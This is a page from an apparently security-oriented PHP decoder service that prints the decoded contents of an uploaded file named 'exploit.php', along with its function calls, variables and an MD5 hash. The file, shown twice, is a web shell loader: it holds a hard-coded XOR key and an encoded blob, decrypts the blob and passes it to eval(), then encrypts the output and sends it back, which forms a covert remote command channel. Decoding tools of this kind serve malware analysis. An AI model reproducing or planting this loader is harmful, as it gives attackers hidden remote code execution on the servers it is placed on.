Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

--c001927a28c6d3c2d11348bc66d04a70 Content-Disposition: form-data; name="uploaded"; filen..

Decoded Output download

--c001927a28c6d3c2d11348bc66d04a70 
Content-Disposition: form-data; name="uploaded"; filename="exploit.php" 
 
<?php 
function base64url_encode($data) { 
  return rtrim(strtr(base64_encode($data), '+/', '-_'), '='); 
} 
 
function base64url_decode($data) { 
  return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT)); 
}  
function x($k, $p){ 
		$c = ""; 
		$l = strlen($k); 
		$pl = strlen($p); 
		for($i = 0; $i < $pl; $i++) { 
			$c .= $k[$i % $l] ^ $p[$i]; 
		} 
		return $c; 
} 
$k = 'a2b611860377f285'; 
$content = file_get_contents("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"); 
$split = explode("=", $content); 
if (strcmp(base64url_decode($split[0]),'s3p3hr')) { 
$decoded = base64url_decode($split[1]); 
		$decrypted = x($k,$decoded); 
		ob_start(); 
		try { 
			eval($decrypted); 
		} 
		catch (exception $e) { 
			print($e->getMessage()); 
		} 
		$o = ob_get_contents(); 
		$c = x($k, $o); 
		$e = base64url_encode($c); 
		ob_end_clean(); 
		print($e . "
"); 
} 
?> 
 
--c001927a28c6d3c2d11348bc66d04a70--

Did this file decode correctly?

Original Code

--c001927a28c6d3c2d11348bc66d04a70
Content-Disposition: form-data; name="uploaded"; filename="exploit.php"

<?php
function base64url_encode($data) {
  return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

function base64url_decode($data) {
  return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT));
} 
function x($k, $p){
		$c = "";
		$l = strlen($k);
		$pl = strlen($p);
		for($i = 0; $i < $pl; $i++) {
			$c .= $k[$i % $l] ^ $p[$i];
		}
		return $c;
}
$k = 'a2b611860377f285';
$content = file_get_contents("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");
$split = explode("=", $content);
if (strcmp(base64url_decode($split[0]),'s3p3hr')) {
$decoded = base64url_decode($split[1]);
		$decrypted = x($k,$decoded);
		ob_start();
		try {
			eval($decrypted);
		}
		catch (exception $e) {
			print($e->getMessage());
		}
		$o = ob_get_contents();
		$c = x($k, $o);
		$e = base64url_encode($c);
		ob_end_clean();
		print($e . "\n");
}
?>

--c001927a28c6d3c2d11348bc66d04a70--

Function Calls

explode	1
file_get_contents	1

Variables

$k	a2b611860377f285
$split	None
$content

Stats

MD5	0a170368250074f32ce5520d8a46ae7c
Eval Count	0
Decode Time	360 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats